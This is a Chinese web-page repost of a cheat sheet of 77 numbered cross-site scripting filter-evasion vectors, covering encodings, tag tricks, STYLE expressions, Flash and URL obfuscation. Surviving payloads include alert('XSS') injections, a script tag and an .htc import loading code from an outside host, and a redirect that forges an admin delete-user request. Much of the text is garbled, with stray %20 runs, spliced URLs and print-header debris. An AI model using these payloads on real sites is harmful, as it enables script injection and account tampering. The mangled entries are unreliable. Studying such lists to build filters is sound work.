首页 > 网络安全 > 脚本攻防

XSS攻击汇总 做网站安全的朋友需要注意下

admin 脚本攻防 2022-02-17 09:21:43 XSS攻击"
(1)普通的XSS JavaScript注入

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号
%20(4)IMG标签大小写不敏感%20%20(5)HTML编码(必须有分号)%20%20(6)修正缺陷IMG标签%20https://www.jb51.net/hack/”>%20(7)formCharCode标签(计算器)%20%20(8)UTF-8的Unicode编码(计算器)%20%20(9)7位的UTF-8的Unicode编码是没有分号的(计算器)%20%20(10)十六进制编码也是没有分号(计算器)%20%20(11)嵌入式标签,将Javascript分开%20%20(12)嵌入式编码标签,将Javascript分开%20%20(13)嵌入式换行符%20%20(14)嵌入式回车%20%20(15)嵌入式多行注入JavaScript,这是XSS极端的例子%20%20(16)解决限制字符(要求同页面)%20%20%20%20%20%20%20%20%20%20%20(17)空字符12-7-1%20T00LS%20-%20Powered%20by%20Discuz!%20Board%20https://www.t00ls.net/viewthread.php?action=printable&tid=15267%202/6%20perl%20-e%20‘print%20“https://www.jb51.net/hack/”;’%20>%20out%20(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用%20perl%20-e%20‘print%20“alert(\https://www.jb51.net/hack/”XSS\https://www.jb51.net/hack/”)https://www.jb51.net/hack/”;’%20>%20out%20(19)Spaces和meta前的IMG标签%20%20(20)Non-alpha-non-digit%20XSS%20%20(21)Non-alpha-non-digit%20XSS%20to%202%20%20(22)Non-alpha-non-digit%20XSS%20to%203%20%20(23)双开括号%20<%20(24)无结束脚本标记(仅火狐等浏览器)%20%20(25)无结束脚本标记2%20%20(26)半开的HTML/JavaScript%20XSS%20(27)双开角括号%20(28)无单引号%20双引号%20分号%20%20(29)换码过滤的JavaScript%20\https://www.jb51.net/hack/”;alert(‘XSS’);//%20(30)结束Title标签%20%20(31)Input%20Image%20%20(32)BODY%20Image%20%20(33)BODY标签%20%20(34)IMG%20Dynsrc%20%20(35)IMG%20Lowsrc%20%20(36)BGSOUND%20%20(37)STYLE%20sheet%20%20(38)远程样式表%20%20(39)List-style-image(列表式)%20
  • XSS%20(40)IMG%20VBscript%20
    • XSS%20(41)META链接url%20URL=http://;URL=https://www.jb51.net/hack/javascript:alert(‘XSS’);https://www.jb51.net/hack/”>%20(42)Iframe%20%20(43)Frame%2012-7-1%20T00LS%20-%20Powered%20by%20Discuz!%20Board%20https://www.t00ls.net/viewthread.php?action=printable&tid=15267%203/6%20(44)Table%20%20(45)TD%20%20(46)DIV%20background-image%20%20(47)DIV%20background-image后加上额外字符(1-32&34&39&160&8192-%208&13&12288&65279)%20%20(48)DIV%20expression%20%20(49)STYLE属性分拆表达%20%20(50)匿名STYLE(组成:开角号和一个字母开头)%20%20(51)STYLE%20background-image%20CLASS=XSS>%20(52)IMG%20STYLE方式%20exppression(alert(“XSShttps://www.jb51.net/hack/”))’>%20(53)STYLE%20background%20%20(54)BASE%20%20(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS%20%20(56)在flash中使用ActionScrpt可以混进你XSS的代码%20a=https://www.jb51.net/hack/”gethttps://www.jb51.net/hack/”;%20b=https://www.jb51.net/hack/”URL(\https://www.jb51.net/hack/”";%20c=https://www.jb51.net/hack/”javascript:https://www.jb51.net/hack/”;%20d=https://www.jb51.net/hack/”alert(‘XSS’);\https://www.jb51.net/hack/”)https://www.jb51.net/hack/”;%20eval_r(a+b+c+d);%20(57)XML%20namespace.HTC文件必须和你的XSS载体在一台服务器上%20%20<?import%20namespace=https://www.jb51.net/hack/”xsshttps://www.jb51.net/hack/”%20implementation=https://www.jb51.net/hack/”http://3w.org/XSS/xss.htchttps://www.jb51.net/hack/”>%20XSS%20%20(58)如果过滤了你的JS你可以在图片里添加JS代码来利用%20%20(59)IMG嵌入式命令,可执行任意命令%20%20(60)IMG嵌入式命令(a.jpg在同服务器)
      Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
      (61)绕符号过滤

      (62)

      (63)

      (64)

      (65)

      (66)12-7-1 T00LS - Powered by Discuz! Board
      https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6

      (67)
      PT SRC=https://www.jb51.net/hack/”http://3w.org/xss.jshttps://www.jb51.net/hack/”>

      (68)URL绕行
      XSS
      (69)URL编码
      XSS
      (70)IP十进制
      XSS
      (71)IP十六进制
      XSS
      (72)IP八进制
      XSS
      (73)混合编码
      tt p://6 6.000146.0×7.147/https://www.jb51.net/hack/”">XSS
      (74)节省[http:]
      XSS
      (75)节省[www]
      XSS
      (76)绝对点绝对DNS
      XSS
      (77)javascript链接
      XSS
      版权声明

      本文仅代表作者观点,不代表本站立场。
      本文系作者授权发表,未经许可,不得转载。
      本文地址:/websafe/jbgongfang/148788.html

      留言与评论(共有 0 条评论)
         
      验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持